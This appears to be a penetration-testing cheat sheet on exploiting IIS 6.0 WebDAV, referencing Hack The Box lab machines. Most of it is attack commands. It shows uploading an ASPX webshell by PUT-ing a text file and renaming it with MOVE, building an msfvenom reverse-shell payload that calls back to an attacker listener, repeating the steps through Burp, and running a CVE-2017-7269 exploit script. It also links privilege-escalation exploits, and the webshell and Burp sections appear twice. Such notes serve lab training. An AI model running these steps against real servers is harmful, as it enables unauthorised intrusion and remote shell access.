IIS6 WebDav

Microsoft Windows 2003|2008|XP

google 'iis 6.0 reverse shell'
Microsoft-IIS/6.0
http-webdav-scan
WebDAV allows clients to perform Web authoring operations remotely.
REF: Granny/Grandpa-HTB
https://github.com/ohpe/juicy-potato/releases

nmap finds webdav

nmap -sV -sC -oA nmap 10.x.x.x
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE
GET - download
PUT - upload
MOVE - you can rename/move

davtest

> davtest -url http://10.x.x.x

cadaver

> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok

PUT/MOVE

Scenario:
- Can 'put' text - upload
- NOT 'put' aspx
- Can 'move' aspx

------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444

Burp

Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!

iis6-exploit

CVE-2017-7269
iis_shell.py
iis6-exploit-2017-CVE-2017-7269
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
usage: iis6webdav.py RHOST RPORT LHOST LPORT

> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444

Windows 2003

Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: https://www.exploit-db.com/exploits/6705/

PreviousIIS NextLocal File Inclusion (LFI)

Last updated 2 years ago

Was this helpful?

PUT/MOVE

Scenario:

Can 'put' text - upload
NOT 'put' aspx
Can 'move' aspx

------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444

Burp

Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!